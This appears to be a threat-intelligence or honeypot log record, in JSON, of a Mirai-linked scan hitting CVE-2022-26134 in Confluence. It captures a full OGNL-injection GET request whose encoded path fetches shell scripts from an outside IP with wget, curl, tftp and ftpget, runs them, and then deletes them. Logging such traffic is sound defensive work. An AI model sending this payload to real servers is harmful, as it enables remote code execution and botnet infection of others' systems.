2022-06-06_Mirai_CVE-2022-26134
{
"query": "213.202.230.64",
"total": 241,
"events": [
{
"port": 443,
"protocol": "tcp",
"results": [
{
"data": {
"payload": "GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cd%20/tmp%20%7C%7C%20cd%20/var/run%20%7C%7C%20cd%20/mnt%20%7C%7C%20cd%20/root%20%7C%7C%20cd%20/;%20wget%20http://15.204.7.101/ohsitsvegawellrip.sh;%20curl%20-O%20http://15.204.7.101/ohsitsvegawellrip.sh;%20chmod%20777%20ohsitsvegawellrip.sh;%20sh%20ohsitsvegawellrip.sh;%20tftp%2015.204.7.101%20-c%20get%20ohsitsvegawellrip.sh;%20chmod%20777%20ohsitsvegawellrip.sh;%20sh%20ohsitsvegawellrip.sh;%20tftp%20-r%20ohsitsvegawellrip2.sh%20-g%2015.204.7.101;%20chmod%20777%20ohsitsvegawellrip2.sh;%20sh%20ohsitsvegawellrip2.sh;%20ftpget%20-v%20-u%20anonymous%20-p%20anonymous%20-P%2021%2015.204.7.101%20ohsitsvegawellrip1.sh%20ohsitsvegawellrip1.sh;%20sh%20ohsitsvegawellrip1.sh;%20rm%20-rf%20ohsitsvegawellrip.sh%20ohsitsvegawellrip.sh%20ohsitsvegawellrip2.sh%20ohsitsvegawellrip1.sh;%20rm%20-rf%20*h%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1\\r\\nHost: [REDACTED]\\r\\nUser-Agent: python-requests/2.27.1\\r\\nAccept-Encoding: gzip, deflate\\r\\nAccept: */*\\r\\nConnection: keep-alive\\r\\n\\r\\n",
"sha256": "e0997a47cc5709f1556f6282e9cf01eb1d23c921036e35dc4640b9a0cf5b13d5",
"extra": {
"http": {
"path": "/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cd%20/tmp%20%7C%7C%20cd%20/var/run%20%7C%7C%20cd%20/mnt%20%7C%7C%20cd%20/root%20%7C%7C%20cd%20/;%20wget%20http://15.204.7.101/ohsitsvegawellrip.sh;%20curl%20-O%20http://15.204.7.101/ohsitsvegawellrip.sh;%20chmod%20777%20ohsitsvegawellrip.sh;%20sh%20ohsitsvegawellrip.sh;%20tftp%2015.204.7.101%20-c%20get%20ohsitsvegawellrip.sh;%20chmod%20777%20ohsitsvegawellrip.sh;%20sh%20ohsitsvegawellrip.sh;%20tftp%20-r%20ohsitsvegawellrip2.sh%20-g%2015.204.7.101;%20chmod%20777%20ohsitsvegawellrip2.sh;%20sh%20ohsitsvegawellrip2.sh;%20ftpget%20-v%20-u%20anonymous%20-p%20anonymous%20-P%2021%2015.204.7.101%20ohsitsvegawellrip1.sh%20ohsitsvegawellrip1.sh;%20sh%20ohsitsvegawellrip1.sh;%20rm%20-rf%20ohsitsvegawellrip.sh%20ohsitsvegawellrip.sh%20ohsitsvegawellrip2.sh%20ohsitsvegawellrip1.sh;%20rm%20-rf%20*h%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/",
"header_order_hash": "069c492ae6117efcda8a7d5788841bc4",
"header_order": "host,user_agent,accept_encoding,accept,connection",
"method": "GET",
"version": "1.1",
"headers": {
"host": "[REDACTED]",
"connection": "keep-alive",
"user-agent": "python-requests/2.27.1",
"all": "{\"host\": \"[REDACTED]\", \"connection\": \"keep-alive\", \"accept-encoding\": \"gzip, deflate\", \"user-agent\": \"python-requests/2.27.1\", \"accept\": \"*/*\"}"
}
}
},
"tags": [
"MALIGN",
"HTTP_SCANNER",
"MALICIOUS"
]
}